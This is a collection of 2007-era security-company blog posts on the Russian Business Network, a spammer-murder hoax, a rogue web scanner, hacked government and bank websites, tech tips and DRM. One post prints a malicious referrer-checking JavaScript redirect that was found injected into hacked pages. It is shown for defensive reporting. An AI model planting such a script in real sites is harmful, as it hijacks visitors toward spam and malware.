The Great Years: 2004-2010
For some time, malware researchers around the globe have been tracking the shady work of the Russian Business Network (RBN) .
If you wanted to point a finger at one group responsible for a lot of pain on the Internet these days, it’s this outfit.
![Rbn[1]](http://sunbeltblog.eckelberry.com/wp-content/ihs/alex/rbn%5B1%5D_thumb.jpg)
Brian Krebs at the Washington Post has written a good overview of the RBN.
Article here, with further posts on Brian’s blog here and here.
Alex Eckelberry
(Hat tip to Ferg)
Who is Alexey Tolstokozhev? According to a post on a website run by “Alex Loonov”, he’s a really bad spammer and he’s been shot.
Wow, just saw this on TV, so I decided to translate this story into English so my readers will be first to learn this. Sorry for mistakes in my English, I’m doing this in a hurry 🙂
Alexey Tolstokozhev (btw, in Russian his name means ‘Thick Skin’), a Russian spammer, found murdered in his luxury house near Moscow. He has been shot several times with one bullet stuck in his head. According to authorities, this last head shot is a clear mark of russian hit men (known as “killers” in Russia).
This is starting to circulate around the net rapidly.
Except I’m not sure it’s true.
Alexey Tolstokozhev doesn’t show up on ROKSO. He doesn’t show up on any web searches. And no one I know in the security industry has ever heard of this guy.
And who is Alex Loonov? Well, his website shows all kinds of archives and looks like it has a lot of material.
Except it was only registered today, at, of all places, the infamous EST Domains.
I smell a hoax.
Alex Eckelberry
(Hat tip to Jose Nazario)
Update: Yup, it’s certainly a hoax.
Update 2: I wouldn’t encourage visits to this hoax site. There’s no malware on it and you’re not going to get infected. But given where this thing is hosted (and the fact that it is tracking visits), why bother? (If you’re seriously paranoid, you might even go so far as to use TOR to anonymize yourself.)
At any rate, here’s the link to the hoax website: loonov(dot)com/russian-viagra-and-penis-enlargement-spammer-murdered(dot)htm
This is a new scam, which does a fake scan of your PC off of a web page. Pretty cool to watch — it just makes stuff up.
As Sunbelter Patrick Jordan says:
It installs a toolbar and an exe in a webspyshield folder however, it is a fake web based scam. You have to be connected for it to run and I would hate to think what anyone may pay for to register it as it is no real software but only a new form of their online scanner scams.
The hijackthis shows it even hijacks the home page.
R0 – HKCUSoftwareMicrosoftInternet ExplorerMain,Start Page = http://webspyshield(dot)com/scan.html
O2 – BHO: WebSpyShieldToolBarShower – {DC87418B-0B2C-424E-900D-54F2ECE15B6B} – C:Program FilesWebSpyShieldWebSpyShield.dll
O3 – Toolbar: WebSpyShield – {E4988DE7-C5DB-4173-96F9-AAC426AF7BCE} – C:Program FilesWebSpyShieldWebSpyShield.dll
O4 – HKCU..Run: [WebSpyShield] C:Program FilesWebSpyShieldWebSpyShield.exe
Alex Eckelberry
(Credit to Bharath)
Our new email archiving product, Sunbelt Exchange Archiver, is being released November 5th. I’m holding a webinar to give a preview peek of the product.
Webinar: Powerful Email Archiving for Exchange Made Easy
Join us for a sneak preview of Sunbelt Software’s new Exchange email archiving and compliance solution, Sunbelt Exchange Archiver™, scheduled for release the first week in November.
If you need a powerful, easy to use, enterprise-class email archiving tool that automatically enables you to comply with all requirements, and allows you or your end-users to transparently retrieve any archived email, then don’t miss this webinar.
The webinar will be hosted by Alex Eckelberry, CEO and Greg Kras, VP of Product Management for Sunbelt Software on Tuesday, October 16th at 2:00pm EDT and will explain the features and benefits of implementing a powerful email archiving solution on your Exchange Server at an affordable price.
Learn how Sunbelt Exchange Archiver can help you:
- Improve Exchange performance
- Eliminate PST headaches
- Dramatically reduce backup times
- Use up to 80% smaller message store
- Meet compliance requirements
- And more
When: Tuesday, October 16, 2007 2:00 PM EDT
To register for this event click here.
I’m actually quite excited about this release. This is a really, really good tool for archiving emails for security, compliance and performance purposes.
Alex Eckelberry
How to make custom toolbars out of folders
One way to make a custom toolbar in XP or Vista is to use the New Toolbar selection when you right click the taskbar. Then you can browse to a folder and turn it into a toolbar. However, if you have multiple monitors, you may in some cases have trouble docking these new toolbars on your secondary monitors. Here’s another way that will overcome that problem.
You can put any kind of file or program on these toolbars. For example, I created a toolbar that holds shortcuts to each computer on my network. You can see screenshots of these custom toolbars on my blog site.
Where are Vista system restore files?
QUESTION: Just a short question. Hope you can answer it for me. Where can I find the system restore files in Vista? Thank you. — Ken K
ANSWER: The file filter driver system for system restore used in XP and other previous versions of Windows is replaced with a new approach in Vista. Now, when you create a restore point, a shadow copy of a file or folder is created. A shadow copy is essentially a previous version of the file or folder at a specific point. Windows Vista can create restore points automatically, or do so when you ask. When the system needs to be restored, files and settings are copied from the shadow copy to the live volume used by Windows Vista. To find shadow copies for a particular file, navigate to that file in Windows Explorer, right click it and select Properties. Then click the Previous Versions tab. Here you’ll see the shadow copies that have been saved on the hard disk and the date when each was created. To find the actual location of the copy, right click it, select Properties, and look at the Location field on the General tab. See the screenshots of this here.
How to log onto XP if you forgot your password redux: In our last TechTips, we wrote about how to logon to XP if you forgot your password. Reader Angus Scott-Fleming writes “Have you seen or used this? I have, it works as advertised, allowing you to boot from a CD and reset any local Windows NT/2000/XP user’s password: Link here.
WGA validation no longer required to download IE 7
Microsoft has changed their policy on downloading Internet Explorer 7. Now all XP users can upgrade to the newest version of the browser – without going through the “Windows Genuine Advantage” validation process to verify that you aren’t running a pirated copy of the operating system. Is this a trend? Will the company back off the annoying (even to those with a genuine OS) WGA validation requirement for other downloads? We don’t know, but it seems like a step in the right direction. Read about it here.
Vista: What’s that power button on the Start menu for?
Vista gives you plenty of options when it comes to shutting down your computer. At the lower right of the Start menu, you’ll see three buttons: a Power button, a lock button and a right arrow button. Clicking the right arrow gives you all the usual choices: switch user, log off, lock, restart, sleep, hibernate and shut down. Clicking the lock button gives you a fast way to lock the computer. Clicking the Power button will save your work and programs as they are and put the computer into sleep mode or, if it’s a portable computer and the battery is low, this will save your work to the hard disk and turn it off. See a screenshot of these buttons here.
IE home page resets to “about:blank” and Defender quits
If you suddenly find that your home page has been reset to “about: blank” and Windows Defender unexpectedly quits, take action quickly. This can mean that your computer has been infected with the Win32/Banker Trojan, and it’s an ugly one because it collects personal information when you visit online banking sites. To find out more, see KB article 894269.
Troubleshoot problems with reading CDs and DVDs
If your Windows XP computer is unable to read a CD or DVD, it can be due to any of several causes. KB article 321641 provides troubleshooting guidelines to help you determine what the problem is and how to resolve it.
Automatic updates cause Svchost.exe issues
When you use Microsoft Update to scan for or apply updates that use Windows Installer 3.1, you may find that CPU usage goes up to 100% and the computer stops responding and/or you get an access violation error related to the svchost.exe process. If this is happening to you, check out KB article 932494.
Deb Shinder
This is actually quite serious. Beer(dot)ch has been hacked and is serving some very vicious malware. DO NOT GO TO THIS SITE UNLESS YOU KNOW WHAT YOU’RE DOING.
Alex Eckelberry
(Hat tip)
Yahoo guy Ian Rogers skateboards (something I used to do until fairly recently, when a broken rib made me realize my age) and used to tour with the Beastie Boys.
Ok, so that makes him generally cool. But his anti-DRM rant at to music industry folks is downright inspiring.
I’m here to tell you today that I for one am no longer going to fall into this trap. If the licensing labels offer their content to Yahoo! put more barriers in front of the users, I’m not interested. Do what you feel you need to do for your business, I’ll be polite, say thank you, and decline to sign. I won’t let Yahoo! invest any more money in consumer inconvenience. I will tell Yahoo! to give the money they were going to give me to build awesome media applications to Yahoo! Mail or Answers or some other deserving endeavor. I personally don’t have any more time to give and can’t bear to see any more money spent on pathetic attempts for control instead of building consumer value. Life’s too short. I want to delight consumers, not bum them out.
If, on the other hand, you’ve seen the light too, there’s a very fun road ahead for us all. Lets get beyond talking about how you get the music and into building context: reasons and ways to experience the music. The opportunity is in the chasm between the way we experience the content and the incredible user-created context of the Web.
Lots more here.
Ok, so time for me to rant:
Back in the 80s, I started my professional career at a company called Borland, one of the great success stories of the early microcomputer software business. (While Borland is still around, it’s not nearly the same company as it was, now having moved to Austin, TX from laid-back Santa Cruz, CA and ventured into software for quality assurance testing. Quite different so I can’t speak to the current culture.)
Philippe Kahn, the CEO of Borland, had a very simple philosophy, which molded a lot of my subsequent thinking and practice as I moved forward in the industry.
The philosophy was:
1. No copy protection.
2. Users agreed to a simple “no-nonsense” license agreement, which simply stated that “software was like a book”, and was written in something close to readable English.
3. If you didn’t like the software, you could get your money back (incidentally, the rate of people returning products was incidental).
4. Products were priced affordably (and this was the linchpin of the whole philosophy).
Simple concepts. But the world was different back then. A lot of people in the business now don’t know how bad things were. But here’s the contrast:
1. Software was copy protected and it was a PAIN. An entire company, Central Point Software, was built around a product called Copy II PC, which allowed you to break copy protection. And even if you were the legal owner of a software program, you still wanted to break the copy protection, so you could actually use the product.
2. License agreements were horribly complex.
3. You couldn’t get a refund if you weren’t satisfied.
4. Software was outrageously expensive.
By doing what he did, Kahn helped boom the business. Many people got started in programming with Turbo Pascal, Borland’s first product. You could actually afford it — it was 50 bucks. Microsoft’s Pascal was something like $500 dollars at the time. The company went on to launch a number of other products, but then got bogged down in some bad acquisitions and subsequently got murdered by Microsoft’s pricing strategies for MS Office. (More on that whole story another time.)
To me, Kahn’s philosophy was completely logical. If you made something people wanted that was affordable. people would buy it and they wouldn’t pirate. And by showing the user respect, and not treating everyone like a dishonest scumbag, guess what: You get more honest users.
And so now we come to DRM. It’s as if no one every learned from our early mistakes.
Here’s what’s going to happen:
1. If it’s not stopped, DRM will continue to get more and more complex, with more and more hardware and software interaction, in order to beat the constant stream of people breaking DRM. This will end up breaking applications and the computers themselves. Complexity built upon complexity results in disaster.
2. Hackers will continue to beat the system and so the cycle will continue, getting more and more complex. See 1 above.
3. Some enterprising person will come along and introduce “DRM free” music/videos/games or what have you, and take the market by storm.
The most you want in a licensing control system is “enough to keep the innocent honest”. Such is the case with registration keys for software products — the honest person will pay the registration fee. The dishonest person will always break it. But when you build a system to stop all possibilities of dishonesty, it almost seems that you are building a system based on the logic that “all people are dishonest”, which has as its corollary, “guilty until proven innocent” — in essence, building a system around proving a negative.
Let’s hope that we can create a simple framework for both artists (who really just want to share their creativity with others while getting fairly recompensed) and users to benefit. If we can relieve the system of the DRM virus, it will flow freely and grow.
Alex Eckelberry
(Hat tip)
Interesting little comment storm on yesterday’s blog post.
Alex Eckelberry
Odd little post by a Michigan ABC affiliate:
…We understand that inappropriate advertisements are appearing on a small number of user computers on Web sites across the Internet, including abc12.com.
The source seems to be Spyware. Some web users may have inadvertently installed Spyware (commonly known as Zango or other third party Spyware) without knowing it by viewing a video from a disreputable Web site, playing a game or downloading an application such as icons, smiley faces or other software.
When users with infected computers search Web sites, inappropriate and unapproved ads may appear within normal advertising space without anyone’s control and no revenue associated.
We want to reassure those who may have seen inappropriate ads on abc12.com that these ads are not coming from us.
Link here. [Update: They have now changed the text.]
Alex Eckelberry
Here’s a nice, self-serving press release for me to post:
Spending on security technology, training, assessments, and certification now accounts for one-fifth of total technology budgets, according to research from the Computing Technology Industry Association (CompTIA).
A survey of 1,070 organizations found that on average, they spent 20 percent of their total technology budget in 2006 on security-related expenses. Thats up from 15 percent in 2005, and 12 percent in 2004.
Organizations also expect to increase spending across all areas related to security in the next 12 months. Nearly one-half of respondents to the CompTIA survey said they intend to increase spending on security-related technologies; and one-third of respondents expect to increase spending on security training. Among those expecting to increase spending, the average increase is in the range of 19-23 percent, regardless of area.
The survey also showed that for each dollar spent on security, about 42 cents is allocated for technology product purchases; 17 cents for security-related processes; 15 cents for training; 12 cents for assessments; 9 cents for certification; and the balance on other items.
Antivirus software, firewalls and proxy servers continue to be the top technologies for security enforcement, utilized by nearly all organizations. The past two years have seen a significant increase in the use of multiple security enforcement technologies to combat attacks, including firewalls, proxy servers, intrusion detection systems, physical access control, multi-factor authentication, and other technologies.
Release here.
Alex Eckelberry
Nope, it’s not podcast. This is good old-fashioned radio.
Archive.org has a collection of recordings of the original CounterSpy show which ran during the 40s and 50s. Link here.
Alex Eckelberry
Pre-checked, installing Ask Toolbar and Search Assistant.
(I’m so biased, it’s not even worth continuing with any commentary.)
Alex Eckelberry
Everyone wants to be Microsoft. There’s people using Google keywords of “Microsoft Antispyware”. There’s fake Microsoft security sites being registered. And now an apparent porn search site, maxing-search(dot)com has a fake Microsoft Antispyware Center.
Swatkat has more here.
Alex Eckelberry
(Thanks Suzi)
Ed Dickson, a fellow blogger, noted today that the now-infamous Marin County Transportation Authority website was still serving porn.
Nah, I knew that stuff might be showing up in the Google cache, but as far as I knew as of Friday, it was clean. So I figured I’d do a quick check for myself.
I was a bit surprised to find out he was right. The Marin County website is back to happily serving porn, after all that’s happened.
A simple Google search using the search term “porn sex site:tam.ca.gov” shows the results.
Some pretty rough stuff, I might add…
And attempts to get you to install malware…
I admit, at this point I feel pretty sorry for these folks.
Let’s hope the Governments peeps don’t try and shut down teh internets again.
Alex Eckelberry
Thought I’d share these numbers with you.
Client agent OS usage by CounterSpy Enterprise:
| Windows XP | 82.91% |
| Windows 2000 | 14.88% |
| Server 2003 | 1.83% |
| Vista build 6000 | 0.32% |
| Windows 98 | 0.03% |
| Windows NT 4 | 0.02% |
| Vista build 5744 | 0.00% |
| Vista build 5600 | 0.00% |
| Vista build 6001 | 0.00% |
| Windows ME | 0.00% |
This is a sampling of what operating system CounterSpy Enterprise agents deployed at customer sites report back. In this particular sampling, the bias will be toward small to medium business, and shows a very slow adoption of Vista in business environments.
Now, what our website sees:
| Windows XP | 83.90% |
| Vista | 9.38% |
| Windows 2000 | 3.59% |
| Server 2003 | 1.62% |
| Windows 98 | 1.33% |
| Windows ME | 0.14% |
| Windows NT | 0.02% |
| Windows 95 | 0.02% |
These are the operating system versions as reported by the browser to our main website. This would reflect a mix of more general usage — consumers and business.
I’d be curious to know what others are seeing out there as well.
Alex Eckelberry
Update: Panda gives their take here.
The Bank of Ghana is serving porn.
A Yahoo search brings up some startling results (thumbnailed due to highly graphic content):
Narrowing down the search a wee bit:
Ouch, nasty stuff.
These pages redirect to porn (graphic content).
The code looks for referrals from search engines. Example:
http://rainbowdisplays(dot)com/xxxxx/fetish(dot)js
function f(){
var r=document.referrer,t=””,q;
if(r.indexOf(“google.”)!=-1)t=”q”;
if(r.indexOf(“msn.”)!=-1)t=”q”;
if(r.indexOf(“yahoo.”)!=-1)t=”p”;
if(r.indexOf(“altavista.”)!=-1)t=”q”;
if(r.indexOf(“aol.”)!=-1)t=”query”;
if(r.indexOf(“ask.”)!=-1)t=”q”;
if(r.indexOf(“comcast.”)!=-1)t=”q”;
if(r.indexOf(“bellsouth.”)!=-1)t=”string”;
if(r.indexOf(“netscape.”)!=-1)t=”query”;
if(r.indexOf(“mywebsearch.”)!=-1)t=”searchfor”;
if(r.indexOf(“peoplepc.”)!=-1)t=”q”;
if(r.indexOf(“starware.”)!=-1)t=”qry”;
if(r.indexOf(“earthlink.”)!=-1)t=”q”;
if(t.length&&((q=r.indexOf(“?”+t+”=”))!=-1(q=r.indexOf(“&”+t+”=”))!=-1))
window.location=(“http://grandsupport(dot)net/td/in(dot)cgi?13&seoref=”+encodeURIComponent(document.referrer)+ “¶meter=$keyword&se=$se&ur=1&HTTP_REFERER=”+encodeURIComponent(document.URL)+”&default_keyword=fetish”);
}window.onFocus = f()This loads the site grandsupport(dot)net
Let’s hope they get this cleaned up soon (we have notified them).
Alex Eckelberry
(Thanks to Sunbelt researcher Adam Thomas for this.)
I was rooting for Apple’s iPhone. I even had my kids watch Job’s extraordinary keynote earlier this year.
I was irritated, but somewhat forgiving, of Apple decision only allowing AT&T as a provider. It was arrogant, but it was also typically Apple — and it was worth overlooking in light of such a cool phone. Even the whole price drop fiasco didn’t bother me that much.
And we all know that after a while, a few people figured out a way to unlock the phone so it would actually work on a phone system they actually want to use (Apple’s stock price even went up when the first hack was announced).
Well, Apple didn’t seem to notice the message being loudly telegraphed to it. Because, as we all know, Apple, in an even more astounding and ridiculous act of audacity, then turned hacked phones temporarily into a brick. This was an act so stupid, it boggles the mind.
In my opinion, they should have no future, as a phone provider. Because they refuse to even contemplate how the phone business works. They decided to create their own playbook, and they are now going to get hit in the head with it.
What’s the playbook for phones? You come out with versions that supports both TDMA/CDMA and GSM infrastructures. You partner with a number of phone companies, that blow the phone out for cheap in order to get subscribers. You allow your phone (even tacitly) to become unlocked. And if your phone is hot, you sell millions upon millions of them (the RAZR has sold over 100 million phones — and Apple has bragging rights on a million phones sold?).
Customers are a precious commodity.
Competition is fierce in this business, and one only has to look at the new Tilt, BlackBerry 9000 and LG Voyager to see the handwriting on the wall (heck, what about the low-priced Palm Centro?). Even Zune is starting to go DRM-free now (at least partially), so those slick iPods may be less interesting by the minute.
Apple’s future as a phone provider is bleak.
I’m disgusted by Apple’s jackanape arrogance, and its even more regrettable since they have offerings which I believe are truly valuable and need more adoption. They are doing the same stupid things that nearly killed them as a company back in the late 80s and early 90s with closed systems. As just one example, iTunes is a potential goldmind, and they could focus on getting as many iPhones out there to build a larger market for iTunes (as well as getting other hardware devices to support iTunes), to build content-based recurring revenue streams.
I hope Jobs gets the message: Your customers are everything that ever matters in business.
If you treat your customers like idiots, a terrible thing happens: Nothing.
In other words, you get no customers.
Alex Eckelberry
One example:
www.star.bnl.gov/STAR/html/tmp/pub/effplots/virgin(dot)html
And there’s plenty more.
Now, the national security of our country is not at risk (as far as we know). These are just porn redirects coming off of places in Brookhaven’s site.
Alex Eckelberry
(Brookhaven has been contacted and they are taking these down right away.)
Despite all the hullabaloo, the now-infamous Marin County TAM website, responsible for a federal shutdown of ca.gov sites, is still not completely clean. While it’s not redirecting to malware or porn anymore, it still has some dirt underneath the fingernails.
You can play your own version of Find Waldo with this: Go to the site, view source and find the hacked links… (need a hint?).
You can also see that their junk is still showing up on Google.
(These links are both dead, but still show up in Google searches).
Ok, so that was fun. But let’s do a little more hunting, shall we?
Using the simple search term sex porn site:ca.gov, we now find that madera.courts.ca.gov has experienced some pwnage of its own:
Going to these pages, we see this:
We find the intersection of jurisprudence and… Viagra!
Just another day in the life of a security company. Something interesting, every day.
Alex Eckelberry
(Thanks to Sunbelt researcher Suzi Turner for the help.)
Yesterday, we reported on a federal shutdown of “ca.gov” sites to fix a hack.
Well, we have a little more information on this.
It was the Marin County government website that started all of this — something we reported back in September 12th.
They were warned. But they didn’t believe the warnings:
Marin officials first learned of the hacker’s use of the site when private online security companies warned that the Web page had been infiltrated.
Steinhauser said she and other staffers at first were suspicious of the online warnings from security firms because they were worried they could be a form of “phishing” used by hackers seeking to hijack Web sites.
Well, here’s some email that Suzi Turner (who works for Sunbelt as a security consultant) had sent them, on September 12th (she also left them a voice mail). 
I had also sent them an email on September 12th:
And I’m pretty darned sure we’re not the only ones who alerted them.
There’s also an SC Mag story this morning, with speculation that this was an iFrame hack. No, actually, it was a DNS hack.
So, was shutting down the entire system overkill? Of course. It was complete overkill. But on the other hand, it’s a wake up call: Keep your site clean. And for pete’s sake, please heed the warnings of security researchers when they send you email.
Alex Eckelberry
(thanks to Ferg for his help, and also the numerous unnamed security researchers who helped on this as well.)
